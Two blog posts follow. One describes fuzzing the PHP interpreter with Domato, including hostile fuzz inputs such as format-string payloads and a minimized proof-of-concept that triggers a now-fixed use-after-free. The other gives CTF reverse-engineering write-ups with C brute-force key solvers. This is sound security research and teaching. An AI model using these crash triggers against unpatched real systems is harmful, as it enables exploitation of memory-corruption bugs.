Friday, January 3, 2020

Fuzzing PHP with Domato

For clarity and brevity, the code referenced below has been distilled to its simplest form.  The complete versions which were actually used for fuzzing can be found here.

Lately I've been working on fuzzing the PHP interpreter. I've explored many tools and techniques (AFL, LibFuzzer, even a custom fuzz engine), but most recently I decided to give Domato a try. For those not aware, Domato is a grammar-based DOM fuzzer, built to tease complex bugs out of complex code-bases.  It was originally designed with browsers in mind, but I figured I might be able to re-purpose it for fuzzing the PHP interpreter.

Context-free Grammar


In order to use Domato, one must first describe the language using a context-free grammar.  A CFG is simply a set of rules which define how a language is constructed.  For instance, if our language was composed of sentences in the form...

[name] has [number] [adjective] [noun]s.
[name]'s [noun] is very [adjective].
I want to purchase [number] [adjective] [noun]s. 

...and each of those variables could take several forms, such as...

Names: alice, bob, eve
Numbers: 1, 10, 100
Adjectives: green, large, expensive
Nouns: car, hat, laptop

...then our context-free grammar might look like...

<name> = alice
<name> = bob
<name> = eve
<number> = 1
<number> = 10
<number> = 100
<adjective> = green
<adjective> = large
<adjective> = expensive
<noun> = car
<noun> = hat
<noun> = laptop
<sentence> = <name> has <number> <adjective> <noun>s.
<sentence> = <name>'s <noun> is very <adjective>.
<sentence> = I want to purchase <number> <adjective> <noun>s.

Domato then uses our context-free grammar to generate random combinations which conform to the rules of the language. For example...

eve has 1 expensive laptops.
alice's hat is very green.
I want to purchase 100 expensive cars.
I want to purchase 10 large laptops.
bob has 100 expensive cars.
eve has 100 green laptops.
I want to purchase 100 large laptops.
bob has 1 large cars.
I want to purchase 1 large cars.
I want to purchase 1 large hats.
bob's laptop is very expensive.
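
To make the expansion step concrete, here is a minimal sketch of a random grammar expander in Python.  This is not Domato's implementation; the `GRAMMAR` dictionary and the `expand` helper are names made up for illustration, and the rules are simply the toy grammar from above.

```python
import random
import re

# Toy grammar from the example above: each symbol maps to its alternatives.
GRAMMAR = {
    "name": ["alice", "bob", "eve"],
    "number": ["1", "10", "100"],
    "adjective": ["green", "large", "expensive"],
    "noun": ["car", "hat", "laptop"],
    "sentence": [
        "<name> has <number> <adjective> <noun>s.",
        "<name>'s <noun> is very <adjective>.",
        "I want to purchase <number> <adjective> <noun>s.",
    ],
}

SYMBOL = re.compile(r"<(\w+)>")


def expand(symbol, rng=random):
    """Pick one production for `symbol` and recursively expand its <tags>."""
    production = rng.choice(GRAMMAR[symbol])
    return SYMBOL.sub(lambda m: expand(m.group(1), rng), production)


if __name__ == "__main__":
    for _ in range(5):
        print(expand("sentence"))
```

Passing a seeded `random.Random` instance as `rng` makes the output reproducible, which is handy when a generated sample needs to be regenerated later.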


As you can imagine, by breaking each rule down into many more sub-rules, we can begin to define much more complex language, well beyond a simple search/replace.  In practice, Domato also provides some built-in functionality for limiting recursion, and generating basic types (int, char, string, etc).  For instance, consider the following Domato grammar, which generates pseudo-code...

!max_recursion 10

<varname> = var<int min=0 max=10>

<vardef> = int <varname> = <int>
<vardef> = char <varname> = '<char min=32 max=127>'

<condition> = <varname> == <varname>
<condition> = <varname> == <int>
<condition> = <varname> != <int>

<statement> = <vardef>;
<statement> = if (<condition>) { <statement> } else { <statement> }
<statement> = while (<condition>) { <statement> }
<statement> = <statement>; <statement>;

<examplefuzz> = <statement>

!begin lines
<examplefuzz>
!end lines
 

Feeding this into Domato produces the following...

if (var0 == var5) { int var5 = 915941154; } else { int var3 = 1848395349; }; if (var3 == -121615885) { int var7 = 1962369640;; int var1 = 196553597;;; int var6 = -263472135;; } else { int var2 = 563276937; };
while (var9 == var8) { while (var0 == -2029947247) { int var7 = 1879609559; } }; char var0 = '';;
char var2 = '/';
char var3 = 'P';
if (var8 == var1) { int var7 = -306701547; } else { while (var3 == 868601407) { while (var0 == -1328592927) { char var10 = '^'; }; char var8 = 'L';;; int var9 = -1345514425;; char var5 = 'b';;; } }
int var8 = 882574440;
if (var8 == var9) { int var7 = 1369926086; } else { if (var9 != -442302103) { if (var3 != 386704757) { while (var4 != -264413007) { char var6 = 'C'; } } else { int var8 = 289431268; } } else { char var10 = '~'; } }
char var5 = '+';
if (var9 == 1521038703) { char var2 = '&'; } else { int var7 = -215672117; }
while (var9 == var0) { char var9 = 'X';; int var7 = -1463788903;; }; if (var8 == var7) { int var10 = 1664850687;; char var6 = 'f';; } else { while (var5 == -187795546) { int var3 = -1287471401; } };


This is perfectly suited for fuzzing an interpreter, because each sample is both unusual, and still guaranteed to be syntactically valid! :)

Enumerating the Attack Surface

The next step then is to describe the PHP language as a CFG.  If you're interested in seeing a complete CFG, download the PHP source code, and look in Zend/zend_language_parser.y.  However, I was more interested in fuzzing specific code-patterns.  So, I implemented my CFG such that it only generated calls to built-in functions and class methods using "fuzzy" parameters.  For this, we need a list of functions, methods, and their arguments.

There are two ways to obtain this data.  The simplest is to use PHP's built in Reflection classes to iterate over all defined functions and classes, building a list.  The following code demonstrates this for all internal PHP functions...

<?php

foreach (get_defined_functions()["internal"] as $f) {

    $r = new ReflectionFunction($f);

    $params = array();
    foreach ($r->getParameters() as $p) {
        $params[] = $p->getName();
    }

    echo "$f(" . implode(", ", $params) . ");\n";

}

?>


This produces something like...

andrew@thinkpad /tmp % php lang.php 
zend_version();
func_num_args();
func_get_arg(arg_num);
func_get_args();
strlen(str);
strcmp(str1, str2);
strncmp(str1, str2, len);
strcasecmp(str1, str2);
strncasecmp(str1, str2, len);
each(arr);
error_reporting(new_error_level);
define(constant_name, value, case_insensitive);
defined(constant_name);
get_class(object);
... etc ...


The problem with this however, is that this list contains no type information.  Yes, the ReflectionParameter class does contain a getType method, however it doesn't seem to work at the moment for the vast majority of functions.  :(  Maybe this is a bug?  Hard to say.  Regardless, having type information will make our fuzzing efforts significantly more effective, so it's worth the time investment to find another way to get that data.

The less-elegant way of obtaining this data is to scrape the PHP documentation and parse out what we need.  Luckily, PHP's documentation is generally quite good, and can be downloaded as a single gzipped HTML document here.  After a few arduous hours writing regular expressions, I was able to parse that into a usable list of functions, methods, and argument types.  I'll leave this as an exercise to the reader, but the final product (in CFG form) looked like this...

<functioncall> = abs(<fuzzmixed>)
<functioncall> = acos(<fuzzfloat>)
<functioncall> = acosh(<fuzzfloat>)
<functioncall> = addcslashes(<fuzzstring>, <fuzzstring>)
<functioncall> = addslashes(<fuzzstring>)
<functioncall> = array_change_key_case(<fuzzarray>, <fuzzint>)
<functioncall> = array_chunk(<fuzzarray>, <fuzzint>, <fuzzbool>)

... snip snip snip ...

<methodcall> = <obj_DateInterval>->createFromDateString(<fuzzstring>)
<methodcall> = <obj_DateInterval>->format(<fuzzstring>)
<methodcall> = <obj_DatePeriod>->getDateInterval()
<methodcall> = <obj_DatePeriod>->getEndDate()
<methodcall> = <obj_DatePeriod>->getRecurrences()
<methodcall> = <obj_DatePeriod>->getStartDate()
<methodcall> = <obj_DateTime>->add(<fuzzDateInterval>)
<methodcall> = <obj_DateTime>->createFromFormat(<fuzzstring>, <fuzzstring>, <fuzzDateTimeZone>) 

... snip snip snip ...

<obj_DateInterval> = $vars["DateInterval"]
<obj_DatePeriod> = $vars["DatePeriod"]
<obj_DateTime> = $vars["DateTime"]
<obj_DateTimeImmutable> = $vars["DateTimeImmutable"]
<obj_DateTimeZone> = $vars["DateTimeZone"]
<obj_Directory> = $vars["Directory"]
<obj_DOMAttr> = $vars["DOMAttr"]

... etc ...
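
The scraping itself is left as an exercise above, but the last step (turning a parsed signature into a grammar rule) can be sketched roughly as follows.  This assumes synopsis lines shaped like "float acos ( float $arg )"; that input shape, the type-to-symbol table, and the fallback to `<fuzzmixed>` for unknown types are all assumptions made for illustration, not the parser actually used.

```python
import re

# Assumed mapping from documented PHP type names to grammar symbols.
TYPE_TO_SYMBOL = {
    "int": "<fuzzint>",
    "float": "<fuzzfloat>",
    "string": "<fuzzstring>",
    "array": "<fuzzarray>",
    "bool": "<fuzzbool>",
    "mixed": "<fuzzmixed>",
}

# Assumed synopsis shape: "<return type> <name> ( <type> $arg [, ...] )"
SYNOPSIS = re.compile(r"^\s*\w+\s+(\w+)\s*\((.*)\)\s*$")
PARAM = re.compile(r"(\w+)\s+&?\$\w+")


def synopsis_to_rule(line):
    """Turn one synopsis line into a <functioncall> rule, or None if unparsable."""
    match = SYNOPSIS.match(line)
    if not match:
        return None
    name, params = match.groups()
    # Unknown types fall back to <fuzzmixed> (an arbitrary choice for this sketch).
    symbols = [TYPE_TO_SYMBOL.get(t, "<fuzzmixed>") for t in PARAM.findall(params)]
    return "<functioncall> = %s(%s)" % (name, ", ".join(symbols))


print(synopsis_to_rule("float acos ( float $arg )"))
print(synopsis_to_rule("string addcslashes ( string $str , string $charlist )"))
```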

Setting up Domato

In order for Domato to use our grammar, we'll also need to define some basic components such as <fuzzint>, <fuzzstring>, and <fuzzarray>.  We will set them to potentially dangerous values, such as INT_MAX, -1, NULL, "AAA....AAA", array(array(array())), etc.  These will be fed into our function and method calls.  Additionally, we'll tell Domato to wrap each line in try/catch blocks, so that exceptions and errors won't be fatal.  After quite a lot of tweaking and tuning, my configuration ended up looking a bit like this...

!lineguard try { try { <line> } catch (Exception $e) { } } catch(Error $e) { }

<fuzzvoid> = 

<fuzzbool> = true
<fuzzbool> = false

<fuzzinteger> = <fuzzint>

<fuzzint> = 0
<fuzzint> = 1
<fuzzint> = -1
<fuzzint> = 1000000
<fuzzint> = <largeint>
<fuzzint> = -<largeint>

<largeint> = 2147483647
<largeint> = 2147483648
<largeint> = 4294967295
<largeint> = 4294967296

<fuzzfloat> = 2.2250738585072011e-308

<fuzznumber> = <fuzzint>
<fuzznumber> = <fuzzfloat>

<fuzzstring> = str_repeat("A", 0x100)
<fuzzstring> = implode(array_map(function($c) {return "\\x" . str_pad(dechex($c), 2, "0");}, range(0, 255)))
<fuzzstring> = str_repeat("%s%x%n", 0x100)

<repeatcount> = 257
<repeatcount> = 65537

<array> = range(0, 10)
<array> = array("a" => 1, "b" => "2", "c" => 3.0)
<fuzzarray> = <array>

<fuzzmixed> = <fuzzint>
<fuzzmixed> = <fuzzfloat>
<fuzzmixed> = <fuzzbool>
<fuzzmixed> = <fuzzstring>
<fuzzmixed> = <fuzzarray>

!include php/phplang.txt

<fuzzline> = <methodcall>;
<fuzzline> = <functioncall>;

!begin lines
<fuzzline>
!end lines

We also need to define a template which the grammar will be applied to.  The template will set up the environment, instantiate any objects that might later be used, and then run each fuzz line.  My template looked a bit like this...

<?php

$vars = array(
    "stdClass"                       => new stdClass(),
    "Exception"                      => new Exception(),
    "ErrorException"                 => new ErrorException(),
    "Error"                          => new Error(),
    "CompileError"                   => new CompileError(),
    "ParseError"                     => new ParseError(),
    "TypeError"                      => new TypeError(),
    ... etc ...
);

<phpfuzz>

?>

The last step is to copy and modify Domato's generator.py file.  I found that simply making the following changes was sufficient...
  • Lines 55 and 62: change the root element to '<phpfuzz>'
  • Line 78: reference my own 'template.php'
  • Line 83: reference my own grammar in 'php.txt'
  • Line 134: change the output name and extension to '<uuid>.php'
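
Conceptually, the generator guards each generated line and substitutes the result into the template.  The sketch below imitates that flow in plain Python so the moving parts are visible.  It is a stand-in, not Domato's code: `render_sample` is a hypothetical helper, the template is shortened, and in the real tool the `!lineguard` wrapping is handled by the grammar engine rather than by hand.

```python
# Guard copied from the grammar above; <line> marks where each fuzz line goes.
LINEGUARD = "try { try { <line> } catch (Exception $e) { } } catch(Error $e) { }"

# Shortened stand-in for template.php; <phpfuzz> is the placeholder to fill.
TEMPLATE = """<?php

$vars = array(
    "stdClass" => new stdClass(),
);

<phpfuzz>

?>
"""


def render_sample(fuzz_lines, template=TEMPLATE, guard=LINEGUARD):
    """Wrap each generated line in the guard and drop it into the template."""
    guarded = [guard.replace("<line>", line) for line in fuzz_lines]
    return template.replace("<phpfuzz>", "\n".join(guarded))


print(render_sample(["rand(0, 0);", 'utf8_encode(str_repeat("A", 0x100));']))
```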

We should then be able to generate valid fuzz input!

andrew@thinkpad ~/domato/php % python generator.py /dev/stdout
Writing a sample to /dev/stdout

<?php

$vars = array(
    "stdClass"                       => new stdClass(),
    "Exception"                      => new Exception(),
    "ErrorException"                 => new ErrorException(),
    "Error"                          => new Error(),
    "CompileError"                   => new CompileError(),
    "ParseError"                     => new ParseError(),
    "TypeError"                      => new TypeError(),
    ... etc ...
);

try { try { $vars["SplPriorityQueue"]->insert(false, array("a" => 1, "b" => "2", "c" => 3.0)); } catch (Exception $e) { } } catch(Error $e) { }
try { try { filter_has_var(1000, str_repeat("%s%x%n", 0x100)); } catch (Exception $e) { } } catch(Error $e) { }
try { try { posix_access(implode(array_map(function($c) {return "\\x" . str_pad(dechex($c), 2, "0");}, range(0, 255))), -1); } catch (Exception $e) { } } catch(Error $e) { }
try { try { rand(0, 0); } catch (Exception $e) { } } catch(Error $e) { }
try { try { fputcsv(fopen("/dev/null", "r"), array("a" => 1, "b" => "2", "c" => 3.0), str_repeat(chr(135), 65), str_repeat(chr(193), 17) + str_repeat(chr(21), 65537), str_repeat("A", 0x100)); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["ReflectionMethod"]->isAbstract(); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["DOMProcessingInstruction"]->__construct(str_repeat(chr(122), 17) + str_repeat(chr(49), 65537) + str_repeat(chr(235), 257), str_repeat(chr(138), 65) + str_repeat(chr(45), 4097) + str_repeat(chr(135), 65)); } catch (Exception $e) { } } catch(Error $e) { }
try { try { utf8_encode(str_repeat("A", 0x100)); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["MultipleIterator"]->current(); } catch (Exception $e) { } } catch(Error $e) { }
try { try { dl(str_repeat("A", 0x100)); } catch (Exception $e) { } } catch(Error $e) { }
try { try { ignore_user_abort(true); } catch (Exception $e) { } } catch(Error $e) { } 

Preparing to Fuzz

Now that we have data to fuzz with, we need to build PHP in a way that maximizes our chances of detecting any kind of memory corruption.  For this, I strongly recommend the LLVM Address Sanitizer (ASAN), which detects many classes of invalid memory access (such as use-after-free and out-of-bounds reads and writes), even when they would not immediately result in a crash.

To build PHP with ASAN, download the latest version of the source code here, and run the following commands...

./configure CFLAGS="-fsanitize=address -ggdb" CXXFLAGS="-fsanitize=address -ggdb" LDFLAGS="-fsanitize=address"
make
make install 


Before leaving a fuzzer to run unattended, it's also a good idea to try to eliminate any conditions that hold up the process unnecessarily.  For instance, like most languages, PHP has a function called sleep(), which takes an integer argument and simply waits that many seconds before continuing.  Calling this function with large fuzz-values such as INT_MAX will quickly tie up even a large fuzz cluster.

There are also functions which could cause the process to "crash" legitimately, such as posix_kill(), or posix_setrlimit().  We may wish to remove these from our test corpus in order to reduce the number of false positives.

Finally, since many of the functions and classes listed in the PHP documentation are not actually available in the core install (rather, from extensions) we may wish to remove some of them from our corpus to avoid wasting time calling non-existent code.

After some experimentation, I settled on the following list...

$class_blacklist = array(
// Can't actually instantiate
    "Closure",
    "Generator",
    "HashContext",
    "RecursiveIteratorIterator",
    "IteratorIterator",
    "FilterIterator",
    "RecursiveFilterIterator",
    "CallbackFilterIterator",
    "RecursiveCallbackFilterIterator",
    "ParentIterator",
    "LimitIterator",
    "CachingIterator",
    "RecursiveCachingIterator",
    "NoRewindIterator",
    "AppendIterator",
    "InfiniteIterator",
    "RegexIterator",
    "RecursiveRegexIterator",
    "EmptyIterator",
    "RecursiveTreeIterator",
    "ArrayObject",
    "ArrayIterator",
    "RecursiveArrayIterator",
    "SplFileInfo",
    "DirectoryIterator",
    "FilesystemIterator",
    "RecursiveDirectoryIterator",
    "GlobIterator",
);

$function_blacklist = array(
    "exit", // false positives
    "readline",    // pauses
    "readline_callback_handler_install", // pauses
    "syslog",    // spams syslog
    "sleep", // pauses
    "usleep", // pauses
    "time_sleep_until", // pauses
    "time_nanosleep", // pauses
    "pcntl_wait", // pauses
    "pcntl_waitstatus", // pauses
    "pcntl_waitpid", // pauses
    "pcntl_sigwaitinfo", // pauses
    "pcntl_sigtimedwait", // pauses
    "stream_socket_recvfrom", // pauses
    "posix_kill", // ends own process
    "ereg", // cpu dos
    "eregi", // cpu dos
    "eregi_replace", // cpu dos
    "ereg_replace", // cpu dos
    "similar_text", // cpu dos
    "snmpwalk", // cpu dos
    "snmpwalkoid", // cpu dos
    "snmpget", // cpu dos
    "split", // cpu dos
    "spliti", // cpu dos
    "snmpgetnext", // cpu dos
    "mcrypt_create_iv", // cpu dos
    "gmp_fact", // cpu dos
    "posix_setrlimit"
);
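
One way such a blacklist might be applied is to drop the matching rules from the generated grammar before fuzzing.  The following is only a sketch of that idea: `filter_rules` is a hypothetical helper, and the blacklist shown is a small subset of the list above.

```python
import re

# Small subset of the function blacklist above, for illustration only.
FUNCTION_BLACKLIST = {"sleep", "usleep", "posix_kill", "posix_setrlimit"}

# Matches rules of the form "<functioncall> = name(...)" and captures the name.
CALL = re.compile(r"^<functioncall>\s*=\s*(\w+)\(")


def filter_rules(rules, blacklist=FUNCTION_BLACKLIST):
    """Keep every grammar line except <functioncall> rules for blacklisted names."""
    kept = []
    for rule in rules:
        match = CALL.match(rule)
        if match and match.group(1) in blacklist:
            continue
        kept.append(rule)
    return kept


rules = [
    "<functioncall> = abs(<fuzzmixed>)",
    "<functioncall> = sleep(<fuzzint>)",
    "<functioncall> = posix_kill(<fuzzint>, <fuzzint>)",
]
print("\n".join(filter_rules(rules)))
```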

Although one machine could both generate and fuzz the samples alone, I opted for a small cluster of machines to speed up the process.  I used Proxmox, running on an Intel NUC, with 10 Debian VMs whose jobs were the following...

  • Node 0: Sample generator, hosting an NFS share.
  • Nodes 1-8: Fuzz nodes, pulling samples from the NFS share to test.
  • Node 9: Triage node: Binning crashing samples based on crash metrics.

I created simple, crude shell scripts to run on each of these to carry out those duties.  Those scripts can be found in the GitHub repo linked above.
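
As an illustration of what the triage node's binning could look like, the sketch below groups samples by the address of the first stack frame in an AddressSanitizer report.  It is not one of the scripts from the repo: `bin_crashes` is a hypothetical helper, and the reports are made-up strings that only imitate the "#0 0x... in function file:line" frame layout.

```python
import re
from collections import defaultdict

# First stack frame of an ASAN report, e.g. "    #0 0x55d0c1 in foo file.c:12"
TOP_FRAME = re.compile(r"^\s*#0\s+(0x[0-9a-fA-F]+)", re.MULTILINE)


def bin_crashes(reports):
    """Group sample names by the address of frame #0 in their ASAN report."""
    bins = defaultdict(list)
    for sample, report in reports.items():
        match = TOP_FRAME.search(report)
        key = match.group(1) if match else "unknown"
        bins[key].append(sample)
    return dict(bins)


# Made-up reports purely for illustration; these are not real results.
reports = {
    "a.php": "==1==ERROR: AddressSanitizer: heap-use-after-free\n    #0 0x1000 in f a.c:1\n",
    "b.php": "==2==ERROR: AddressSanitizer: heap-use-after-free\n    #0 0x1000 in f a.c:1\n",
    "c.php": "==3==ERROR: AddressSanitizer: stack-overflow\n    #0 0x2000 in g b.c:2\n",
}
print(bin_crashes(reports))
```

Raw addresses are only comparable across runs if the binary is loaded at the same base each time, so binning on the symbolized function name may be a steadier key in practice.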


Finding Crashes

After only a short period of time, my work paid off!  Within minutes the fuzzer had generated several crashing samples, and overnight it created more than 2,000.

By binning the crashes according to the instruction address they crashed on, I was able to determine that all 2,000 were the result of only 3 unique bugs.  Of these, 2 were clearly unexploitable (both OOM errors due to stack exhaustion), however the last appeared to be a use-after-free!  Here is the minimized crashing sample...

<?php
$x = array(new XMLWriter());
$x[0]->openUri("/tmp/a");
$x[0]->startComment();
?>


This bug has since been fixed in bug#79029 (this commit), and should be included in the next release.  In the next few blog posts I will discuss the process of tracing it back to the root cause, abusing it to achieve arbitrary code execution, and a neat little shellcode trick that I discovered along the way.

Stay tuned!  :)

Thursday, April 27, 2017

DakotaCon 2017 CTF Write-ups

DakotaCon 7 is a wrap, and the CTF was a blast!  Many thanks to Alex for putting it all together this year.  First place went to ZonkSec, who also deserve a shout-out for their awesome write-ups here.  No sense in duplicating that excellent work, but I’d like to cover a few of the other challenges which I found particularly interesting.  Links to relevant files are included below each section.

This covers RE 200, RE 250, Exploit 100, Exploit 250, and Web 150.

RE 200

RE200 supplied a binary and an IP/port combination on which that binary was said to be running.  The challenge stated “Give it a valid key to get the flag”.

When run, this program asked for a key and then read data from stdin.  The first key I tried was of course invalid.



Opening this binary in IDA revealed only two interesting functions: main() and strip_newline().  Unsurprisingly, strip_newline() did exactly what it said, replacing trailing newlines with NULLs.  Without too much additional effort it was also clear that main() simply read in up to 40 characters, checked to ensure exactly 15 had actually been supplied, and then looped through each performing some operation on the array.  Eventually, it compared another local variable to the 32-bit constant “0x65b6b48c” and printed the flag if a match was found.  This left me with a simplified IDA graph that looked like this:



The only part that did NOT initially make sense was the body of the loop, which performed complex operations involving addition, subtraction, multiplication, and shifts in both directions.  This looked very strange, until I remembered that compilers will occasionally replace simple math operations with more complex (but more efficient) variants using magic constants.  The two constants shown above looked suspiciously like this type of optimization, so I asked myself, “What other two operations might the challenge creator check following a check for divisibility by 2?”  The obvious answer was “divisibility by 3,4,5,6….”, so I compiled a testcase and checked for similar patterns.

#include <stdio.h>
int main() {
  int i;
  for(i=0; i<15; i++) {
    if(i % 2 == 0) {}
    else if(i % 3 == 0) {}
    else if(i % 4 == 0) {}
    else if(i % 5 == 0) {}
    else if(i % 6 == 0) {}
    else if(i % 7 == 0) {}
    else if(i % 8 == 0) {}
    else if(i % 9 == 0) {}
    else {}
  }
}

I compiled this code (32 bit ELF with gcc) and disassembled it.  Ah ha!  The code generated for “i % 3 == 0” and “i % 5 == 0” was nearly identical to the two blocks shown above. This meant the program had to be something like:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main() {

  char buffer[40];
  int result = 0, i;
  FILE *fp;
 
  fgets(buffer, 40, stdin);
  strip_newline(buffer);
 
  if(strlen(buffer) == 15) {
 
    for(i=0; i<15; i++) {
 
      if(i % 2 == 0)
        result += buffer[i];
 
      if(i % 3 == 0)
        result *= buffer[i];
 
      if(i % 5 == 0)
        result ^= buffer[i];
 
    }
 
    if(result == 0x65b6b48c) {
      fp = fopen("keycheck1-flag", "r");
      fgets(buffer, 40, fp);
      strip_newline(buffer);
      fclose(fp);
      printf("Flag is %s\n", buffer);
      exit(0);
    } else {
      printf("Invalid key\n");
      exit(0);
    }
 
  } else {
 
    printf("Invalid key\n");
 
  }
 
}
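
For readers who have not met the magic-constant trick mentioned earlier, here is a small Python model of how a compiler can replace signed 32-bit division by 3 or 5 with a multiply and a shift, and derive the remainder from that.  The constants 0x55555556 and 0x66666667 are the ones commonly emitted for these divisors; whether they are exactly the two constants in this binary is an assumption, since the screenshot is not reproduced here.

```python
def div_magic(n, magic, shift):
    """Signed 32-bit n / d using multiply-high instead of a divide instruction."""
    high = (n * magic) >> 32            # upper half of the 64-bit signed product
    return (high >> shift) - (n >> 31)  # n >> 31 is -1 for negative n, so this rounds toward zero


def is_divisible_by_3(n):
    # remainder = n - 3 * (n / 3)
    return n - 3 * div_magic(n, 0x55555556, 0) == 0


def is_divisible_by_5(n):
    # remainder = n - 5 * (n / 5)
    return n - 5 * div_magic(n, 0x66666667, 1) == 0


print([i for i in range(15) if is_divisible_by_3(i)])
print([i for i in range(15) if is_divisible_by_5(i)])
```

Seeing a multiply by one of these constants followed by shifts and a subtraction is therefore a strong hint that the original source contained a plain `/` or `%`.
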

With a full understanding of how the program worked I got a pen and paper and tried to find a simple solution.  However, I quickly realized there wasn’t going to be one (with my limited math skill at least), so I instead wrote a small program to bruteforce an answer.  No, this is probably not the most efficient way to do it. Yes, it worked. :)

#include <stdio.h>
#include <stdlib.h>
 
#define START_CHAR ' '  // try a, A, 0, etc...
#define END_CHAR '/'    // try z, Z, 9, etc...
 
int main() {
 
  char a,b,c,d,e,f,g,h,i,j,k,l,m,n,o;
  char buffer[16] = {0};
  int z, result;
 
  for(a=START_CHAR; a<=END_CHAR; a++) { buffer[0] = a;
  for(b=START_CHAR; b<=END_CHAR; b++) { buffer[1] = b;
  for(c=START_CHAR; c<=END_CHAR; c++) { buffer[2] = c;
  for(d=START_CHAR; d<=END_CHAR; d++) { buffer[3] = d;
  for(e=START_CHAR; e<=END_CHAR; e++) { buffer[4] = e;
  for(f=START_CHAR; f<=END_CHAR; f++) { buffer[5] = f;
  for(g=START_CHAR; g<=END_CHAR; g++) { buffer[6] = g;
  for(h=START_CHAR; h<=END_CHAR; h++) { buffer[7] = h;
  for(i=START_CHAR; i<=END_CHAR; i++) { buffer[8] = i;
  for(j=START_CHAR; j<=END_CHAR; j++) { buffer[9] = j;
  for(k=START_CHAR; k<=END_CHAR; k++) { buffer[10] = k;
  for(l=START_CHAR; l<=END_CHAR; l++) { buffer[11] = l;
  for(m=START_CHAR; m<=END_CHAR; m++) { buffer[12] = m;
  for(n=START_CHAR; n<=END_CHAR; n++) { buffer[13] = n;
  for(o=START_CHAR; o<=END_CHAR; o++) { buffer[14] = o;
 
    result = 0;
 
    for (z=0; z<15; z++) {
 
      if(z % 2 == 0) {
        result += (int)buffer[z];
      }
 
      if(z % 3 == 0) {
        result *= (int)buffer[z];
      }
 
      if(z % 5 == 0) {
        result ^= (int)buffer[z];
      }
 
    }
 
    if(result == 0x65b6b48c) {
      printf("\n\nWIN: %s = 0x%08x\n", buffer, result);
      exit(0);
    }
 
  }}}}
  printf("%s = 0x%08x\r", buffer, result);
  }}}}}}}}}}}
 
}
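
As a side note on the search space, the check can be ported to Python to see which key positions matter at all.  This is only a sketch based on the reconstructed loop above: `to_int32` and `checksum` are hypothetical helper names, and the port assumes the C arithmetic wraps at 32 bits.

```python
def to_int32(value):
    """Wrap a Python integer to a signed 32-bit value."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value


def checksum(key):
    """Port of the loop reconstructed above; `key` is a 15-character ASCII string."""
    result = 0
    for z, ch in enumerate(key.encode("ascii")):
        if z % 2 == 0:
            result = to_int32(result + ch)
        if z % 3 == 0:
            result = to_int32(result * ch)
        if z % 5 == 0:
            result = to_int32(result ^ ch)
    return result


# Positions that are not a multiple of 2, 3 or 5 never reach any branch.
unused = [z for z in range(15) if z % 2 and z % 3 and z % 5]
print(unused)
print(checksum("AAAAAAAAAAAAAAA") == checksum("AzAAAAAzAAAzAzA"))
```

Since the characters at positions 1, 7, 11 and 13 never influence the result, four of the fifteen nested loops could be fixed to a constant, which shrinks the brute-force space considerably.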

After running several instances in parallel for several hours with different inputs, it finally spat out:


When submitted to the server, I got the flag.


The binary can be downloaded here.

RE 250

This challenge was very similar to RE200, however it added one twist.  This time, only 10 bytes were required from the user (up to 40 read), but before being looped over and the result calculated, the program would connect out to 138.247.115.12:10011 and receive up to 39 bytes.  These bytes were then XORed with the user input buffer before the main loop.  Additionally, this loop only contained two conditional operations, as opposed to three above.  Again, I saw interesting integer constants resulting from compiler optimization. Additionally, the final result was compared against “0xfffffaba” which is the signed negative integer -1350. All together, I imagine the source code looks something like this:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main() {

  char buffer1[40], buffer2[40];
  int result = 0, i;
  FILE *fp;
 
  fgets(buffer1, 40, stdin);
  strip_newline(buffer1);
  read(custom_connect_func("138.247.115.12", 10011), buffer2, 39);
 
  if(strlen(buffer1) == 10) {
 
    xor_buffers(buffer1, buffer2);  // destination=buffer1
 
    for(i=0; i<10; i++) {
 
      if(i % 3 == 0)
        result *= buffer1[i];

      if(i % 2 == 0)
        result -= buffer1[i];
 
    }
 
    if(result == 0xfffffaba) {
      fp = fopen("keycheck2-flag", "r");
      fgets(buffer1, 40, fp);
      strip_newline(buffer1);
      fclose(fp);
      printf("Flag is %s\n", buffer1);
      exit(0);
    } else {
      printf("Invalid key\n");
      exit(0);
    }
 
  } else {
    printf("Invalid key\n");
  }
 
}
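
The signed reading of the comparison constant can be double-checked with a couple of lines of Python.  This is just a worked check of the arithmetic; `as_signed32` is a hypothetical helper name.

```python
import struct


def as_signed32(value):
    """Reinterpret an unsigned 32-bit constant as a signed 32-bit integer."""
    return struct.unpack("<i", struct.pack("<I", value))[0]


print(as_signed32(0xFFFFFABA))  # -1350
```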

When I connected to the socket referenced in the binary, it sent back the string “EiHohtei5s” (10 bytes).  This value stayed static.  I never observed a change.  Pretty straightforward.  I adapted my bruteforcer code from above to handle this challenge.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
#define START_CHAR 'A'  // try a, A, 0, etc...
#define END_CHAR 'z'    // try z, Z, 9, etc...
 
void xor_buffers(char *dst, char *src) {
  int i;
  for(i=0; i<10; i++) {
    dst[i] ^= src[i];
  }
}
 
int main() {
 
  char buffer1[40] = {0}, buffer2[40] = {0};
  char a,b,c,d,e,f,g,h,i,j;
  int z, result;
 
  for(a=START_CHAR; a<=END_CHAR; a++) {
  for(b=START_CHAR; b<=END_CHAR; b++) {
  for(c=START_CHAR; c<=END_CHAR; c++) {
  for(d=START_CHAR; d<=END_CHAR; d++) {
  for(e=START_CHAR; e<=END_CHAR; e++) {
  for(f=START_CHAR; f<=END_CHAR; f++) {
  for(g=START_CHAR; g<=END_CHAR; g++) {
  for(h=START_CHAR; h<=END_CHAR; h++) {
  for(i=START_CHAR; i<=END_CHAR; i++) {
  for(j=START_CHAR; j<=END_CHAR; j++) {
 
    result = 0;
 
    strcpy(buffer2, "EiHohtei5s");
    buffer1[0] = a; buffer1[1] = b; buffer1[2] = c;
    buffer1[3] = d; buffer1[4] = e; buffer1[5] = f;
    buffer1[6] = g; buffer1[7] = h; buffer1[8] = i;
    buffer1[9] = j;
 
    xor_buffers(buffer2, buffer1);
 
    for(z=0; z<10; z++) {
 
      if(z % 3 == 0)
        result *= buffer2[z];
 
      if(z % 2 == 0)
        result -= buffer2[z];
 
    }
 
    if(result == 0xfffffaba) {
      printf("\n\nWIN: %s = 0x%08x\n", buffer1, result);
      exit(0);
    }
 
  }}}}
  printf("%s = 0x%08x\r", buffer1, result);
  }}}}}}
}

In a matter of seconds this spat out a correct solution (probably one of thousands, if not many more).


Submitting this to the server captured the flag.
